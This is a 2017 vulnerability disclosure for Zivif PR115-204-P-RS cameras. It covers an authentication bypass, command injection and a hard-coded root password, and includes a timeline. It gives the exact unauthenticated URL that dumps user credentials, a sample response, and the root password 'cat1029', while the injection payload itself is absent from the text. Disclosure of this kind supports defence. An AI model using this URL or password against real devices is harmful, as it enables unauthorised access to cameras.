Zivif PR115-204-P-RS Bypass / Command Injection / Hardcoded Password

Zivif PR115-204-P-RS cameras version suffer from authentication bypass, command injection, and hardcoded password vulnerabilities.

MD5 | c34cc75d39516718e28358cc3f925ed6

Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <[email protected]>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103

1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105,
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email

Implementation of access controls is Zivif cameras is severely lacking.
As a result, CGI functions can be called directly, bypassing
authentication checks.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0
Credentials are returned in cleartext to the requester.

In exploring, unauthenticated remote command injection is possible using

Command results are not returned, however are executed by the system.

One last findings was the /etc/passwd file contains the following
hard-coded entry (CVE-2017-17107):

The encrypted password is cat1029.

(none) login: root
Login incorrect
(none) login: root
Welcome to SONIX.
\[email protected]\h:\W$
Because of the way the file system is structured, changing this password
requires more work then running passwd.

The hi3510 is shared with a couple other cameras I'm exploring. The
motd saying /Welcome to SONIX/ has lead me to speculate parts of this
firmware may be shared with other cameras.


Related Posts